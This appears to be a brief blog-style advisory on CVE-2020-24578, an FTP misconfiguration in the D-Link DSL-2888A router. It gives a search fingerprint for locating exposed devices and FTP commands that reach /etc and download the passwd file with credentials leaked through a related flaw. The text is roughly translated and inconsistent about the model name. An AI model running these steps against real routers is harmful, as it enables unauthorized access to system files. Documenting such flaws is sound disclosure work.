D Link Dsl 28881a Ftp Configuration Error Cve 2020 24578
D Link Dsl 28881a Ftp Configuration Error Cve 2020 24578
D-Link DSL-28881A FTP configuration error CVE-2020-24578
Vulnerability Description
The D-Link DSL-2888A router has file sharing capability, which allows users to share files with other network users by plugging an external drive into the router.
Vulnerability Impact
D-Link DSL-2888A
Network surveying and mapping
body=”DSL-2888A”
Vulnerability reappears
The premise is to use D-Link DSL-28881A Information Leakage CVE-2020-24577 to obtain FTP credentials
Use the following command on the FTP client to connect to the FTP service with valid credentials (obtained from Finding-2). Use the following command to navigate to the root folder.
ftp xxx.xxx.xxx.xxx
ftp> cd etc
ftp> get passwd
If you gain something, just like it
This post is licensed under CC BY 4.0 by the author.